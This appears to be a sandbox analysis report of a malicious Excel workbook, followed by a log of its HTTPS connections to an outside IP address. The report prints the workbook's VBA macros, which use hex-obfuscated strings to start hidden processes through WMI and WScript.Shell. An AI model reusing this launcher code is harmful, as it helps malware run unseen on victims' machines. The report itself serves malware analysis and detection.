Data Raw:	01 16 01 00 03 f0 00 00 00 5c 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 8a 03 00 00 62 06 00 00 00 00 00 00 01 00 00 00 06 54 fe 5e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 04 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "vzbprmttn"
Function wdzlbznhf(ixzfgqpig As String) As Integer
Set edkankwdkqmipo = GetObject(soyfeuyzgsyz("77696e6d676d74733a5c5c") & soyfeuyzgsyz("2e5c726f6f745c63696d7632"))
Set jupwigkjmzusaimuh = edkankwdkqmipo.Get(soyfeuyzgsyz("57696e33") & soyfeuyzgsyz("325f50726f6365737353746172747570"))
Set zntkkzkmzqhln = jupwigkjmzusaimuh.SpawnInstance_
zntkkzkmzqhln.ShowWindow = 0
Set kcsxyinih = GetObject(soyfeuyzgsyz("77696e6d676d74733a5c5c2e5c726f6f745c63696d76323a57696e33325f") & soyfeuyzgsyz("50726f63657373"))
wdzlbznhf = kcsxyinih.Create(ixzfgqpig, Null, zntkkzkmzqhln, intProcessID)
End Function
Private Function soyfeuyzgsyz(ByVal ivvupjbvpfpv As String) As String
Dim avroknxhwdfg As Long
For avroknxhwdfg = 1 To Len(ivvupjbvpfpv) Step 2
soyfeuyzgsyz = soyfeuyzgsyz & Chr$(Val("&H" & Mid$(ivvupjbvpfpv, avroknxhwdfg, 2)))
Next avroknxhwdfg
End Function

VBA File Name: yhrgaijdj.bas, Stream Size: 1527

General
Stream Path:	_VBA_PROJECT_CUR/VBA/yhrgaijdj
VBA File Name:	yhrgaijdj.bas
Stream Size:	1527
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T ; z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 01 f0 00 00 00 04 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 0b 03 00 00 9f 04 00 00 00 00 00 00 01 00 00 00 06 54 3b 7a 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "yhrgaijdj"
Sub kwsdbwalvozrufglg(cmdLine As String)
CreateObject(zgzorzvdjmqc("57536372") & zgzorzvdjmqc("6970742e5368656c6c")).Run cmdLine, 0
End Sub
Private Function zgzorzvdjmqc(ByVal gljjlqdrymld As String) As String
Dim jgpkaiatiidu As Long
For jgpkaiatiidu = 1 To Len(gljjlqdrymld) Step 2
zgzorzvdjmqc = zgzorzvdjmqc & Chr$(Val("&H" & Mid$(gljjlqdrymld, jgpkaiatiidu, 2)))
Next jgpkaiatiidu
End Function

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.25248375193
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 264

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	264
Entropy:	2.84232947881
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 b5 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 180

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	180
Entropy:	3.39679535637
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . ` . . . P J . . @ . . . . . . . P J . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 04 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 1e 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 13083

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	13083
Entropy:	4.24089225486
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . K . W N . ) 8 . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 665

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	665
Entropy:	5.36248874755
Base64 Encoded:	True
Data ASCII:	I D = " { 4 3 F 9 D 6 2 D - 7 4 7 5 - 4 6 D C - B 6 8 2 - 2 E F E 0 2 3 4 7 0 D 2 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = d o g b d t b k c . . M o d u l e = v z b p r m t t n . . M o d u l e = y h r g a i j d j . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V
Data Raw:	49 44 3d 22 7b 34 33 46 39 44 36 32 44 2d 37 34 37 35 2d 34 36 44 43 2d 42 36 38 32 2d 32 45 46 45 30 32 33 34 37 30 44 32 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 194

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	194
Entropy:	3.54294516912
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . d o g b d t b k c . d . o . g . b . d . t . b . k . c . . . v z b p r m t t n . v . z . b . p . r . m . t . t . n . . . y h r g a i j d j . y . h . r . g . a . i . j . d . j . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 64 6f 67 62 64 74 62 6b 63 00 64 00 6f 00 67 00 62 00 64 00 74 00 62 00 6b 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3905

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3905
Entropy:	4.74058072057
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1360

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:	data
Stream Size:	1360
Entropy:	4.07759016526
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 : . = . b D . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . .
Data Raw:	93 4b 2a 85 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 05 00 00 00 00 00 01 00 02 00 05 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 02 00 00 7e 6f 00 00 7f 00 00 00 00 15 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 127

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:	data
Stream Size:	127
Entropy:	2.83150557929
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . i x z f g q p i g . . . . . . . . i v v u p j b v p f p v k . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 09 00 00 00 00 00 03 00 ff ff ff ff 03 00 00 08 09 00 00 00 69 78 7a 66 67 71 70 69 67 04 00 00 08 0c 00 00 00 69 76 76 75 70 6a 62 76 70 66 70 76 6b 00 00 7f 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 94

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:	data
Stream Size:	94
Entropy:	2.10173103061
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . ~ \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . f . . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 08 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 04 00 00 12 00 00 04 00 00 12 01 00 66 00 00 7f 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 158

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:	data
Stream Size:	158
Entropy:	2.23341721545
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . 0 ( . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 28 00 81 00 00 00 00 00 02 00 00 00 00 60 04 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 61 00 00 00 00 00 01 00 00 00 00 00 06 30 28 00 a9 00 00 00 00 00 02 00 01 00 00 60 04 00 fc ff ff ff ff ff ff ff ff ff ff ff 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 711

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	711
Entropy:	6.57045508387
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . K d . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 c3 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 aa 12 4b 64 0d 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2022 12:12:55.457520008 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:55.457566023 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:55.457644939 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:55.461855888 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:55.461896896 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:55.559115887 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:55.559278011 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:55.573375940 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:55.573405981 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:55.573759079 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:55.767818928 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:55.939781904 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:55.982206106 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.685950994 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.686017036 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.686028957 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.686073065 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.686117887 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.686132908 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.686145067 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.686158895 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.686188936 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.686522007 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.686538935 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.686563969 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.686564922 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.686583042 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.686594009 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.686597109 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.686619997 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.686638117 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.686647892 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.686667919 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.686686039 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.686703920 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.686909914 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.687148094 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.708903074 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.708934069 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.708966970 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.708975077 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.709008932 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.709032059 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.709068060 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.709089994 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.709469080 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.709484100 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.709512949 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.709542990 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.709547997 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.709558964 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.709568024 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.709587097 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.709979057 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.709990978 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.710030079 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.710052013 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.710057974 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.710072041 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.710378885 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.732291937 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.732342005 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.732821941 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.732845068 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.733093023 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.733130932 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.733208895 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.733217955 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.733227968 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.733437061 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.733475924 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.733531952 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.733541012 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.733593941 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.733616114 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.733649015 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.733688116 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.733694077 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.733721972 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.733784914 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.733814001 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.733860016 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.733866930 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.733905077 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.734091043 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.734127045 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.734178066 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.734185934 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.734196901 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.735471964 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.735846996 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.760679007 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.760724068 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.760795116 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.760853052 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.760922909 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.760943890 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.760958910 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.761229992 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.761409998 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.761449099 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.761497021 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.761503935 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.761553049 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.761671066 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.761706114 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.761748075 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.761754990 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.761765003 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.761816025 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.762476921 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.762525082 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.762589931 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.762610912 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.762619019 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.762825966 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.762861013 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.762914896 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.762922049 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.762936115 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.763411999 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.763586998 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.763623953 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.763665915 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.763673067 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.763686895 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.764034986 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.764071941 CEST	443	49171	144.76.136.153	192.168.2.22
Apr 8, 2022 12:12:56.764113903 CEST	49171	443	192.168.2.22	144.76.136.153
Apr 8, 2022 12:12:56.764122009 CEST	443	49171	144.76.136.153	192.168.2.22
